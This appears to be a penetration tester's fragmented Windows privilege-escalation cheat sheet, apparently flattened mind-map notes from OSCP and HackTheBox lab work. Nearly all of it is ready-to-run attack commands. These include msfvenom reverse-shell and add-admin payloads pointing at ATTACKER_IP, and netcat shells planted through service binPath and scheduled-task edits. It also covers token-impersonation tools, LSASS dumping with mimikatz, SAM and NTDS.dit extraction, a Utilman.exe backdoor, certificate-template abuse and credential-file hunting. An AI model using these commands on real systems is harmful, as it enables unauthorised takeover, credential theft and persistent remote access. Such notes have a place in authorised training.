5.0-win privesc

Windows Privilege Escalation

Privesc Tips

svc restart

hijack

msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi

write-UserAddMSI

msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi

 .\PrintSpoofer64.exe -i -c powershell.exe

 .\PrintSpoofer64.exe -i -c C:\Users\Public\tmp\local_admin\weaken.bat

Hacking.Files/Hacking.Notes/Hacking.4WindowsLocalAdminPrivEsc > Local PrintNightmare (Privesc)

printnightmare

powerup

download (ntds.dit & SYSTEM) to attack box

impacket-secretsdump -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

next, save and export the SYSTEM reg. This is required to extract info with secretsdump

potato

runas /user:aslam cmd

xfreerdp /u:aslam /p:Password123! /v:$trgt1

.\GodPotato-NET4.exe -cmd "cmd /c C:\Users\Public\tmp\local_admin\weaken.bat"

.\GodPotato-NET4.exe -cmd "cmd /c whoami /all"

win-key+u

upload nc.exe

Set-SeBackupPrivilege

Copy-FileSeBackupPrivilege C:\Users\Administrator\Desktop\root.txt root.txt

If the service is auto-start, and you don't have permission to restart the service

shutdown /r /t 0

sc.exe stop <service>
sc.exe start <service>

restart-service <service>

sc.exe config VSS binPath="C:\path\to\nc.exe -e cmd.exe <listen_ip> <port>"

set up listener

sc.exe config VGAuthService binPath="C:\path\to\nc.exe -e cmd.exe <listen_ip> <port>"

rdesktop -u "" -p "" $trgt1

open login window: try rdesktop

mv C:\Windows\System32\cmd.exe C:\Windows\System32\Utilman.exe

c:\path\to\SYSTEM
c:\path\to\SAM
c:\path\to\SECURITY

icacls 'C:\path\to\file' /grant <user>:F
icacls 'C:\path\to\file' /grant All:F

whoami /priv

.\Enable-Privilege.ps1

takeown /f 'C:\path\to\file'

Set-SeBackupPrivilege

Copy-FileSeBackupPrivilege Z:\Windows\ntds\ntds.dit .\ntds.dit

reg save HKLM\SYSTEM SYSTEM

if required enable restore priv:
https://github.com/gtworek/PSBits/blob/master/Misc/EnableSeRestorePrivilege.ps1

mv C:\Windows\System32\utilman.exe C:\Windows\System32\Utilman.old

icacls 'C:\path\to\file' /grant <user>:F
icacls 'C:\path\to\file' /grant All:F

import-module .\Enable-Privilege.ps1

note: if the takeownership exists, but is not enabled

takeown /f 'C:\path\to\file'

download to attacker box

Get-SeBackupPrivilege

diskshadow /s C:\path\to\shadow_script.txt

robocopy /B F:\Windows\NTDS .\myFolder ntds.dit

SeBackupPrivilegeCmdLets.dll
SeBackupPrivilegeCmdLets.dll

unix2dos shadow_script.txt

dir C:\Users\Administrator

extract the hash: between : and :::

import-module .\SeBackupPrivilegeCmdLets.dll

import-module .\SeBackupPrivilegeUtils.dll

SAM local creds

shadow copy

If you have an account that is a member of the Backup Operators group on a Domain Controller

reg save HKLM\SYSTEM SYSTEM
reg save HKLM\SAM SAM

set verbose on  
set metadata C:\Windows\Temp\meta.cab  
set context clientaccessible  
set context persistent  
begin backup  
add volume C: alias cdrive  
create  
expose %cdrive% E:  
end backup

upld

impacket-secretsdump -sam SAM -system SYSTEM LOCAL

cd C:\Windows\system32

FS navigation & read

SeBackupPrivilegeCmdLets.dll
SeBackupPrivilegeUtils.dll

import-module .\SeBackupPrivilegeCmdLets.dll

Get-SeBackupPrivilege

import-module .\SeBackupPrivilegeUtils.dll

Copy-FileSeBackupPrivilege C:\Windows\ntds\ntds.dit .\ntds.dit

runas, crackstation, hashcat, decode, crackmapexec, hydra, etc.

Installed Program

Certificate Service DCOM Access

AD Recycle Bin

runas, crackstation, hashcat, decode, crackmapexec, hydra, etc.

Exclude MS default

schtasks /query /fo LIST /v | findstr /v "\Microsoft"

icacls C:\TASK_PATH\task.bat

Interesting files

exposed creds

reg query "HKCU\Software\TightVNC\Server"

reg query "HKCU\Software\ORL\WinVNC3\Password"

reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s

schtasks /query /fo LIST /v

if you have enough privs, restore obj

certipy-ad find -u ryan.cooper -p NuclearMosquito3 -target sequel.htb -text -stdout -vulnerable

reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription

reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription

reg query "HKCU\Software\OpenSSH\Agent\Key"

for l in $(cat creds.txt); do u=$(echo $l | cut -d ':' -f1); p=$(echo $l | cut -d ':' -f2); echo -e "SEARCHING AS USER: $u\n" && certipy-ad find -u $u -p $p -target $trgt1 -text -stdout -vulnerable; done

multiple user (valid creds)

creds format:

user1:pass1
user2:pass2

Restore-ADObject -Identity '562f229c-e03a-4005-a098-10046e9b8942'

certipy-ad req -u ryan.cooper -p NuclearMosquito3 -target sequel.htb -upn administrator@sequel.htb -ca sequel-dc-ca -template UserAuthentication

Hunt for sensitive information, e.g. previously deleted user info

DN or GUID

certipy-ad auth -pfx administrator.pfx

runas, crackstation, hashcat, decode, crackmapexec, hydra, etc.

Get-ADObject -filter { SAMAccountName -eq "<username>" } -includeDeletedObjects -property *

Review permissions:

enrollment
Object control

read deleted AD objects

Get-ChildItem -Path C:\ -Include *.kdbx,*.pdf,*.txt,*.doc,*.docx,*.xml -File -Recurse -ErrorAction SilentlyContinue

Get-ChildItem -Path C:\windows.old -Include *SAM,*SYSTEM,*SECURITY,*.kdbx,*doc,*xml,*config -File -Recurse -ErrorAction SilentlyContinue

Get-ChildItem -Path C:\ -Include vnc.ini,ultravnc.ini,*vnc*,web.config,php.ini,httpd.conf,httpd-xampp.conf,*.ini,my.cnf,SiteList.xml,ConsoleHost_history.txt,*.gpg,*.pgp,*config*.php,elasticsearch.y*ml,kibana.y*ml,*.p12,*.der,*.csr,*.cer,known_hosts,id_rsa,id_dsa,*.ovpn,anaconda-ks.cfg,hostapd.conf,rsyncd.conf,cesi.conf,supervisord.conf,tomcat-users.xml,*.kdbx,KeePass.config,Ntds.dit,SAM,SYSTEM,FreeSSHDservice.ini,access.log,error.log,server.xml,ConsoleHost_history.txt,setupinfo,setupinfo.bak,key3.db,key4.db,places.sqlite,sav,*.doc -File -Recurse -ErrorAction SilentlyContinue

Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects

Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *

crackmapexec ldap  $trgt1 -u ryan.cooper -p NuclearMosquito3 -M adcs

identify vulnerable templates

certipy-ad req -u <username> -p <password> -target $trgt1 -upn administrator@sequel.htb -ca sequel-dc-ca -template UserAuthentication

Contains:
RestorePriv
BackupPriv

groups

dir "C:\Program Files (x86)"

dir "C:\Program Files"

file analysis

Get-ChildItem -Path C:\Users\dave\ -Include *.log,*.db,*.gpg,*.pgp,*.xls,*.docx,*.pdf,*.txt,*.kdbx,KeePass.config,known_hosts,id_rsa*,id_dsa*,Ntds.dit,*.ovpn,*config*.php,access.log,error.log,server.xml,*vnc* -File -Recurse -ErrorAction SilentlyContinue

Non-standard programs installed

google: <prog> exploit
<prog> LPE exploit etc.

domain tgt

saved creds

reg

type C:\inetpub\wwwroot\web.config | findstr connectionString

win.old/backup FS

interesting files

hidden folders

"password" in file

look for filetypes

File system enum

dir C:\

tree C:\Users /f

Enumerate drives

users' home

Get-ChildItem -Recurse -ErrorAction SilentlyContinue -Include *.bak,*.ini | ForEach-Object { try { Select-String -Path $_.FullName -Pattern "password" -CaseSensitive:$false } catch {} }

modify extension & search str accordingly

cd C:\<path>

findstr /si password *.xml *.ini *.txt

powerup

Get-LocalUser

interesting privs
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens

Environment

Console history

saved creds

SeRestoePrivilege + RDP

local_user/SeTakeOwnershipPrivilege

https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1

Backup Operator

Server Operator

SeTakeOwnershipPrivilege

Any unusual non-default folders? e.g.
-windows.bak/windows.old > sam/system
-SqlServer 4dm/1 OSCP Related/AD OSCP Style Labs/HtB Machines/Escape > Lateral Movement File System Enumeration SQL Logs
etc.

Running Services

Scheduled Tasks

rdp (via rdesktop)

SeImpersonatePrivilege

SeRestorePrivilege + RDP

Certificate Service DCOM Access

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

AlwaysInstallElevated

Backup Operators

SeDebugPrivilege

SeBackUpPrivilege

SeTakeOwnershipPrivilege

User Information

Server Operators

AD Recycle Bin

net localgroup Administrators

interesting grps

net users /domain

net localgroup

whoami

SeDebugPrivilege

dir /a

whoami /priv

whoami /groups

pypykatz lsa minidump lsass.DMP

shadow copy

procdump.exe -ma LSASS lsass.dmp

upld

mimikatz.exe
log
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

download to attack box

Copy-FileSeBackupPrivilege C:\Users\Administrator\Desktop\root.txt root.txt

Copy-FileSeBackupPrivilege C:\Windows\ntds\ntds.dit .\ntds.dit

impacket-secretsdump -sam SAM -system SYSTEM LOCAL

reg save HKLM\SYSTEM SYSTEM
reg save HKLM\SAM SAM

download to attacker box

import-module .\SeBackupPrivilegeCmdLets.dll

import-module .\SeBackupPrivilegeUtils.dll

procdump.exe -accepteula -ma lsass.exe lsass.dmp

impacket-secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

extract the hash: between : and :::

cd E:

diskshadow /s shadow_script.txt

robocopy E:\Windows\ntds . ntds.dit

Set-SeBackupPrivilege

dir C:\Users\Administrator

Get-SeBackupPrivilege

start cmd.exe as admin

SeBackupPrivilege

SAM local creds

unix2dos shadow_script.txt

reg save HKLM\SYSTEM SYSTEM
reg save HKLM\SAM SAM

download to attacker box

set verbose on  
set metadata C:\Windows\Temp\meta.cab  
set context clientaccessible  
set context persistent  
begin backup  
add volume C: alias cdrive  
create  
expose %cdrive% E:  
end backup

FS navigation & read

SeBackupPrivilegeCmdLets.dll
SeBackupPrivilegeCmdLets.dll

Google unfamiliar groups for privesc

net user <username>

Installed Applications

Patching info + kernel vuln

Installed Driver Versions

https://github.com/giuliano108/SeBackupPrivilege

/local_user/SeBackupPrivilege

Privileges

Services & Network Information

net user

Privesc Enum

systeminfo

System information

Auto enum

Running Processes

Manual enum

SeImpersonate

AlwaysInstallElevated

download to attacker box

impacket-secretsdump -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

pypykatz lsa minidump lsass.DMP

extract the hash: between : and :::

impacket-secretsdump -sam SAM -system SYSTEM LOCAL

Things to look out for:

Keep Kernel exploits in back pocket - they can be hit and miss. (Come back to these if there's no luck elsewhere)
Cache logon count - (useful for AD sets) to move around after getting localadmin
User's Powershell History
LANMANCompatibility, the version used determines if you can pass your hash to authenticate, or if you have to crack the hash
Local Users
'Ever Logged Users', this could potentially provide domain users who have logged on the current machine
User home folders - if you gain localadmin, you can navigate any user's home folder
Processes that are hijackable - look for other users' processes - non standard processes
Services with writeable/createfile permissions, or unquoted services - non standard services
Scheduled Tasks

Tip

It may not be a requirement to privesc as such on ms01 after initial access.

You can look for creds to do spraying
You can set up tunnelling and enumerate internal machines (ms02/dc01)
If you have a domain account, you can do domain enumeration etc.,

Tip

If you can't get Admin access and you need the user's Hash, you can try Net-NTLMv2 Responder attacks.
If you have code execution on a remote machine, and you want to capture the user's NTLM hash, but you don't have privileges to run mimikatz, you can attempt ntlm hash capture using responder

transfer payload->
backup and replace the original

grant full access to new payload

runas, crackstation, hashcat, decode, crackmapexec, hydra, etc.

e.g. send mail to..

e.g. upload doc to..

hints

local_admin (folder): weaken.exe

Install-ServiceBinary -Name 'SERVICE_NAME'

NOTE: if the AbuseFunction throws an error, this doesn't necessarily mean an exploit doesn't exist. Always perform manual checks.

powerup

icacls <service_name>.exe /grant Everyone:F

grant full access to new payload

icacls <service_name>.exe /grant Everyone:F

schtasks /run /tn TASK_NAME

transfer payload->
backup and replace the original

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe-service -o <service_name>.exe

1.1

nc -lvnp 4444

echo C:\Users\Public\tmp\local_admin\weaken.exe >> C:\task.ps1

echo nc64.exe -e cmd.exe ATTACKER_IP 4444 >  TASK_PATH\task.bat

nc -lvnp 4444

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe-service -o <service_name>.exe

select load_file('C:\\test\\nc.exe') into dumpfile 'C:\\test\\shell.exe';

lsass.DMP

SYSTEM & NTDS.dit

https://youtu.be/OrlMSSYiDpU?si=JJwRSbnxXKZBaXFR

exposed cached creds files

exposed creds

SAM & SYSTEM

svc interactions

MySQL

MSSQL

write perm
(Wertrigger explit)

select load_file('C:\\test\\phoneinfo.dll') into dumpfile "C:\\Windows\\System32\\phoneinfo.dll";

.\WerTrigger.exe

.\nc.exe <attack_ip> <port> -c cmd.exe

HTTP (internal website)

http://240.0.0.1/phpmyadmin

show databases;
use db;
select * from table;

xp_cmdshell whoami

mysql -u root -h 240.0.0.1

impacket-mssqlclient sql_svc:'Dolphin1'@10.10.165.148 -windows-auth

enable_xp_cmdshell

silver ticket - etc,

remote

https://medium.com/@Thigh_GoD/ligolo-ng-finally-adds-local-port-forwarding-5bf9b19609f9

Local port forward

./agent -connect <remote_ip>:11601 -retry -ignore-cert

sudo ip tuntap add user <username> mode tun ligolo

sudo ip link set ligolo up

sudo ip route add 240.0.0.1/32 dev ligolo

./proxy -selfcert

on trgt

transfer the malicious DLL to the vulnerable search order location
backup and replace the original

1.1

nc -lvnp 4444

Import-Module .\PrivescCheck.ps1

Invoke-PrivescCheck -Extended

TIP
Checklist Extra: https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit?hl=en_US

grant full access to new payload

local_admin (folder): weaken.dll

msfvenom -p windows/x64/exec CMD="net user aslam_admin Password123! /add; net localgroup Administrators aslam_admin /add" -f dll -o <filename>.dll -a x64

msfvenom -p windows/x64/shell_reverse_tcp LHOST=4444 LPORT=443 -f exe > <filename>.exe

nc -lvnp 4444

1.1

local_admin (folder): weaken.exe

Rename the exploit and save it the vulnerable location

`icacls C:\MyPrograms\Disk.exe /grant Everyone:F`

sc.exe stop <service>
sc.exe start <service>

restart-service <service>

If the service is auto-start, and you don't have permission to restart the service

shutdown /r /t 0

wmic qfe get Caption,Description,HotFixID,InstalledOn

wmic product get name,version,vendor | findstr /v "Microsoft Corporation"

NOTE: service executable must make calls to DLLs where 'NAME NOT FOUND'

Hacking.Files/Hacking.Notes/Hacking.4WindowsLocalAdminPrivEsc > 3.2. DLL Service Hijacking

msfvenom -p windows/x64/shell_reverse_tcp LHOST=4444 LPORT=443 -f dll > <filename>.dll

.\winPEASx64.exe

reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

Think about the processes that are running:
- What is the integrity level of the process?
- Who owns the process?
- If you see a Web Server and SQL Server running:
  - Think about if there's a 'web server solution' that likely spawned a Web Server and SQL server? e.g. XAMPP

Binary service hijack

get-process

Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

driverquery /fo table /si

Are there any non-standard Windows Drivers?
- Look at who the manufacturers are of the drivers
- Are there any known exploits for these drivers?
- https://www.loldrivers.io/

wmic process get name,ProcessID

wmic process get ProcessID,ExecutablePath | findstr "proc_name"

Hacking.Files/Hacking.Notes/Hacking.4WindowsLocalAdminPrivEsc > Executable WinPEAS

Get-ScheduledTask | ft TaskName,TaskPath,State

Local service forwarding

unquoted service path

dll service hijack

Narrow

icacls C:\path

sc.exe qc SERVICE_NAME

schtasks /query /tn TASK_NAME /fo list /v

binary hijack

exposed creds

wmic service get name,displayname,pathname,startmode

Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

narrow

Get-UnquotedService

narrow

invoke-allchecks

tasklist /svc

wmic service get name,pathname

script modification

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

wmic service list brief

note: when using WinRM or a bind shell, Get-Ciminstance and Get-service may result in a "permission denied" error when using a non-administrative account

reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription

type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

cat (Get-PSReadlineOption).HistorySavePath | sls passw

cmd

set

cat (Get-PSReadlineOption).HistorySavePath

dir env:

IIS config

PS history

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

ipconfig
netstat -ano
route print

std cmd

cmd

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

PS trasncript

cmdkey /list

klist

forfiles /S /M *.log /C "cmd /c findstr /I password @file"

non-default scripts executed by System, e.g. improper uninstall via Software Manager e.g. SCCM

cmd colour

narrow

val: 0x1

gui access

adduser

revshell

revsh

adduser

e.g.

perm

vss

vgauth

shadow_script.txt

view all

narrow